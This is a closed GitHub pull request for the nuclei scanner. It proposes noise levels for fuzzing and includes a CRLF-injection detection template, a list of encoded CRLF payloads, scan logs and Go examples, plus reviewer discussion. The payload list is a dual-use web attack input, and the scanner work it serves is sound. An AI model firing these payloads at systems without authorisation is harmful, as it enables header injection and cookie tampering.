
Added noise parameter for http payload conditional fuzzing support #3125

Closed
wants to merge 1 commit into from

Conversation

Ice3man543
Member

Proposed changes

Closes #3005

id: crlf-injection

info:
  name: CRLF Injection
  author: pdteam
  severity: low
  tags: crlf,dast

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      escape:
        low: 
          - "%00"
          - "%0a"
          - "%0a%20"
          - "%0d"
        medium:
          - "%0d%09"
          - "%0d%0a"
          - "%0d%0a%09"
          - "%0d%0a%20"
          - "%0d%20"
          - "%20"
          - "%20%0a"
          - "%20%0d"
          - "%20%0d%0a"
          - "%23%0a"
          - "%23%0a%20"
          - "%23%0d"
          - "%23%0d%0a"
          - "%23%oa"
          - "%25%30"
        high:
          - "%25%30%61"
          - "%2e%2e%2f%0d%0a"
          - "%2f%2e%2e%0d%0a"
          - "%2f..%0d%0a"
          - "%3f"
          - "%3f%0a"
          - "%3f%0d"
          - "%3f%0d%0a"
          - "%e5%98%8a%e5%98%8d"
          - "%e5%98%8a%e5%98%8d%0a"
          - "%e5%98%8a%e5%98%8d%0d"
          - "%e5%98%8a%e5%98%8d%0d%0a"
          - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
          - "%u0000"
          - "%u000a"
          - "%u000d"
          - "\r"
          - "\r%20"
          - "\r\n"
          - "\r\n%20"
          - "\r\n\t"
          - "\r\t"

    fuzzing:
      - part: query
        type: postfix
        fuzz:
          - "{{escape}}Set-Cookie:crlfinjection=crlfinjection"

    stop-at-first-match: true
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'

Example run

./nuclei -t template.yaml -u "https://example.com/?test=value" -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.8.4-dev

                projectdiscovery.io

[INF] Using Nuclei Engine 2.8.4-dev (development)
[INF] Using Nuclei Templates 9.3.3 (latest)
[INF] Templates added in last update: 238
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%2500Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250aSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250a%2520Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250dSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[INF] No results found. Better luck next time!
 
./nuclei -t template.yaml -u "https://example.com/?test=value" -v -noise medium

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.8.4-dev

                projectdiscovery.io

[INF] Using Nuclei Engine 2.8.4-dev (development)
[INF] Using Nuclei Templates 9.3.3 (latest)
[INF] Templates added in last update: 238
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%2500Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250aSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250a%2520Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250dSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250d%2509Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250d%250aSet-Cookie%3Acrlfinjection%3Dcrlfinjection
...

Checklist

  • Pull request is created against the dev branch
  • All checks passed (lint, unit/integration/regression tests etc.) with my changes
  • I have added tests that prove my fix is effective or that my feature works
  • I have added necessary documentation (if appropriate)
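As an added example (not nuclei's code and not part of this PR), the Go program below models the three pieces the template above combines: the nested low/medium/high payload sets selected by a noise level, the `part: query` / `type: postfix` fuzzing that produced the URLs in the verbose log (Go's `net/url` re-encodes the payload, which is why `%00` appears as `%2500`), and the template's header matcher regex run against constructed responses. The `PayloadSet` type, the function names, and the cumulative reading of levels (medium sends low plus medium, which is what the second run shows) are assumptions of this example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// PayloadSet mirrors the nested "escape:" block of the template. The type
// name is an assumption of this example, not a nuclei identifier.
type PayloadSet struct {
	Low, Medium, High []string
}

// noiseOrder is the order in which payload levels are switched on.
var noiseOrder = []string{"low", "medium", "high"}

// SelectPayloads returns the payloads enabled at a noise level. Levels are
// read as cumulative (medium = low + medium, high = all three), matching the
// -noise medium run above, where the four low payloads are sent first.
func SelectPayloads(set PayloadSet, noise string) ([]string, error) {
	groups := [][]string{set.Low, set.Medium, set.High}
	var out []string
	for i, level := range noiseOrder {
		out = append(out, groups[i]...)
		if level == noise {
			return out, nil
		}
	}
	return nil, fmt.Errorf("invalid noise level %q (accepted: low, medium, high)", noise)
}

// FuzzQueryPostfix appends payload to every query parameter value of rawURL
// (part: query, type: postfix) and re-encodes the query. That re-encoding is
// why %00 shows up as %2500 in the verbose log.
func FuzzQueryPostfix(rawURL, payload string) (string, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return "", err
	}
	q := u.Query()
	for _, vals := range q {
		for i := range vals {
			vals[i] += payload
		}
	}
	u.RawQuery = q.Encode()
	return u.String(), nil
}

// crlfMatcher is the template's header regex, unchanged. With (?m), ^ and $
// work per line, and the lazy \s*? before $ absorbs the \r of a CRLF ending.
var crlfMatcher = regexp.MustCompile(`(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)`)

// Matches reports whether the injected cookie appears as a header of its own,
// i.e. whether the CRLF really split the header rather than being reflected.
func Matches(rawHeaders string) bool {
	return crlfMatcher.MatchString(rawHeaders)
}

func main() {
	set := PayloadSet{
		Low:    []string{"%00", "%0a", "%0a%20", "%0d"},
		Medium: []string{"%0d%09", "%0d%0a"},
		High:   []string{"\r\n"},
	}
	for _, level := range noiseOrder {
		payloads, _ := SelectPayloads(set, level)
		fmt.Printf("%-6s -> %d payloads\n", level, len(payloads))
	}

	low, _ := SelectPayloads(set, "low")
	for _, p := range low {
		target, err := FuzzQueryPostfix("https://example.com/?test=value", p+"Set-Cookie:crlfinjection=crlfinjection")
		if err != nil {
			panic(err)
		}
		fmt.Println("Sent HTTP request to", target)
	}

	// Constructed responses: one where the CRLF split off a new header, one
	// where the payload was only reflected inside the Location value.
	split := strings.Join([]string{
		"HTTP/1.1 302 Found",
		"Location: /?test=value",
		"Set-Cookie: crlfinjection=crlfinjection",
		"Content-Length: 0",
		"",
	}, "\r\n")
	reflected := "HTTP/1.1 302 Found\r\n" +
		"Location: /?test=value%0d%0aSet-Cookie:crlfinjection=crlfinjection\r\n"
	fmt.Println("split header matched:  ", Matches(split))
	fmt.Println("reflected only matched:", Matches(reflected))
}
```

The negative case is the one worth keeping in mind when reading the matcher: a payload that is merely reflected inside an existing header value is not a CRLF injection, and the `^` anchor under `(?m)` is what stops the regex from firing on it.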

@Ice3man543 Ice3man543 self-assigned this Jan 2, 2023
@Ice3man543 Ice3man543 added the Status: Review Needed The issue has a PR attached to it which needs to be reviewed label Jan 2, 2023
@Mzack9999
Member

As the change is quite structural (YAML syntax), what do you think about creating different templates with different noise tags and reusing all common parts with #1767?

@Ice3man543
Member Author

@Mzack9999 that would make it quite complicated and probably unusable. This was the cleanest solution I could think of while having all types of payload sets in a single file.

Member

@Mzack9999 Mzack9999 left a comment

LGTM on the implementation - I'd recommend double-checking the proposed YAML syntax change with @ehsandeep.

@@ -195,6 +195,7 @@ on extensive configurability, massive extensibility and ease of use.`)
flagSet.BoolVarP(&options.ForceAttemptHTTP2, "force-http2", "fh2", false, "force http2 connection on requests"),
flagSet.BoolVarP(&options.EnvironmentVariables, "env-vars", "ev", false, "enable environment variables to be used in template"),
flagSet.StringVarP(&options.ClientCertFile, "client-cert", "cc", "", "client certificate file (PEM-encoded) used for authenticating against scanned hosts"),
flagSet.StringVarP(&options.Noise, "noise", "ne", "low", "noise level for http fuzzing (accepted: low,medium,high)"),
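Review bot: the help string promises `accepted: low,medium,high`, but `flagSet.StringVarP` stores whatever the user passes into `options.Noise` and nothing in this hunk checks it, so `-noise med` or `-noise LOW` is accepted at parse time and the mistake surfaces later, if at all. Add a validation step once flags are parsed that rejects anything outside the three values (and say whether matching is case-insensitive) with the same accepted-values message, so a typo fails loudly instead of quietly running a different payload set than the user intended. The help text should also state whether higher levels include the lower ones and what the `low` default means for templates whose payloads carry no level, since every run without the flag now hands `low` to the engine.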
Member

@Ice3man543, what do you think of the short flag nl?

Member

@tarunKoyalwar tarunKoyalwar left a comment

lgtm!

@ehsandeep
Member

ehsandeep commented Jan 31, 2023

@Ice3man543 using payloads with different levels in the template may not work well, as we need to dedupe the payloads in each section to ensure we are not missing obvious/common payloads from one level when using another one, and deduping payloads may not go well as the number of payload lines increases; instead, this can be controlled efficiently directly from the CLI by mapping the payload request counter to noise levels, for example, the low level will execute 30% of the payloads of each template, and so on. Also, let's tackle this later; closing the PR for now as this needs to be reworked in the future with a different strategy.
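As an added example, not nuclei's code, here is the CLI-side alternative sketched in the comment above written out in Go: payloads stay a flat list in the template, are deduplicated once, and the noise level decides what share of them is executed. The 30% figure for low is the one given in the comment; the 60% and 100% for medium and high, the function names, and the round-up rule are assumptions of this example, as is the sample payload list, which is the PR's low and medium sections flattened with one duplicate added on purpose.

```go
package main

import (
	"fmt"
	"strings"
)

// noisePercent maps a noise level to the share of each template's payload
// list that gets executed. 30% for low is the figure given in the comment;
// 60% and 100% for medium and high are assumptions of this example.
var noisePercent = map[string]int{"low": 30, "medium": 60, "high": 100}

// Dedupe removes repeated payloads while keeping first-seen order, so a
// payload that appears in several hand-written sections is sent once and
// the percentage is computed over distinct payloads only.
func Dedupe(payloads []string) []string {
	seen := make(map[string]struct{}, len(payloads))
	out := make([]string, 0, len(payloads))
	for _, p := range payloads {
		if _, dup := seen[p]; dup {
			continue
		}
		seen[p] = struct{}{}
		out = append(out, p)
	}
	return out
}

// RequestBudget returns how many of n payloads a noise level allows. Integer
// arithmetic with round-up means a non-empty list always yields at least one
// request, high always yields all of them, and no float rounding is involved.
func RequestBudget(n int, noise string) (int, error) {
	pct, ok := noisePercent[noise]
	if !ok {
		return 0, fmt.Errorf("invalid noise level %q (accepted: low, medium, high)", noise)
	}
	return (n*pct + 99) / 100, nil
}

// SelectByNoise is the CLI-side cut: dedupe, then keep the first budget
// payloads. It assumes the template author ordered payloads from most to
// least common, which is the trade-off against per-payload level tags.
func SelectByNoise(payloads []string, noise string) ([]string, error) {
	unique := Dedupe(payloads)
	budget, err := RequestBudget(len(unique), noise)
	if err != nil {
		return nil, err
	}
	return unique[:budget], nil
}

func main() {
	// Constructed list: the low and medium sections of the PR's template
	// flattened into one list, with one duplicate added on purpose.
	payloads := []string{
		"%00", "%0a", "%0a%20", "%0d",
		"%0d%09", "%0d%0a", "%0d%0a%09", "%0d%0a%20", "%0d%20",
		"%0a", // duplicate of a low payload
	}
	for _, level := range []string{"low", "medium", "high"} {
		sel, err := SelectByNoise(payloads, level)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-6s %d/%d payloads: %s\n", level, len(sel), len(Dedupe(payloads)), strings.Join(sel, " "))
	}
	if _, err := SelectByNoise(payloads, "loud"); err != nil {
		fmt.Println("rejected:", err)
	}
}
```

The cut is a prefix, so it only gives sensible results when template authors order payloads from most to least common; that ordering requirement is the price of keeping the YAML flat, compared with the per-level tags this PR proposed.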

@ehsandeep ehsandeep closed this Jan 31, 2023
@ehsandeep ehsandeep removed the Status: Review Needed The issue has a PR attached to it which needs to be reviewed label Jan 31, 2023
@ehsandeep ehsandeep deleted the 3005-noise-fuzz branch January 31, 2023 21:43
Successfully merging this pull request may close these issues.

Add noise level to configure fuzzing payload count at runtime based on user preference
4 participants